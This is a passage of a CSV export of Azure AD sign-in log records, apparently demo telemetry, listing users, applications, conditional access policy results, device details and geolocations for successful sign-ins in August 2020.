Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6ab139a2-776a-491f-a231-a575795b0200,SigninLogs,Sucess,36.6404686,-78.26995087
+1701,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:05.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0743c29b-bffe-4b64-bc30-c016e8eb56ff,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 20:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",6ab139a2-776a-491f-a231-a575795b0200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6ab139a2-776a-491f-a231-a575795b0200,SigninLogs,Sucess,36.6404686,-78.26995087
+1702,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:49.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,169892fb-8bed-4a71-9ded-eb0a44d35d16,Microsoft.aadiam,Microsoft.aadiam,,Jordan Ross,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 20:50,"{'operatingSystem': 'Windows 10', 'deviceId': '16377263-6c6e-4b1f-8679-1902a5731dc6', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-E8D2OM5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",c0d2abaa-91b0-4e7b-bfc4-d651e78e0000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.16507720947266, 'latitude': 47.061771392822266}, 'state': 'Washington', 'city': 'Orting'}",none,none,none,none,[],{'errorCode': 0},Jordan Ross,d333c1f2-e2a3-4f8f-8370-35c29b543c62,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c0d2abaa-91b0-4e7b-bfc4-d651e78e0000,SigninLogs,Sucess,47.06177139,-122.1650772
+1703,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:08.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d027f364-ca99-416d-a529-4e7a0f94a163,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 21:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",1138a221-02e6-466a-9195-236f5c9e0100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,1138a221-02e6-466a-9195-236f5c9e0100,SigninLogs,Sucess,36.6404686,-78.26995087
+1704,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:03.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f842d7a1600,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ec85dd07-c5e8-494c-aa5b-3f842d7a1600,SigninLogs,Sucess,33.0175209,35.44601059
+1705,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:07.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,169892fb-8bed-4a71-9ded-eb0a44d35d16,Microsoft.aadiam,Microsoft.aadiam,,Jordan Ross,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 21:37,"{'operatingSystem': 'Windows 10', 'deviceId': '16377263-6c6e-4b1f-8679-1902a5731dc6', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-E8D2OM5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",212014b7-1db5-4fa5-9002-28e53ce90200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.16507720947266, 'latitude': 47.061771392822266}, 'state': 'Washington', 'city': 'Orting'}",none,none,none,none,[],{'errorCode': 0},Jordan Ross,d333c1f2-e2a3-4f8f-8370-35c29b543c62,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,212014b7-1db5-4fa5-9002-28e53ce90200,SigninLogs,Sucess,47.06177139,-122.1650772
+1706,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:04.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f8c541ef-9d53-4719-a9e2-b695b199eec7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 19:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",d3a3c86e-d6a1-4323-9bc0-1a2670ad1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d3a3c86e-d6a1-4323-9bc0-1a2670ad1a00,SigninLogs,Sucess,36.6404686,-78.26995087
+1707,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c23f312-1427-4f5c-a62a-4714fc90c015,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 21:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",47dc00a1-c484-43d0-a54f-6777be1d0200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,47dc00a1-c484-43d0-a54f-6777be1d0200,SigninLogs,Sucess,36.6404686,-78.26995087
+1708,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,37aa5f26-577b-4295-92f2-1eaa15737e79,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 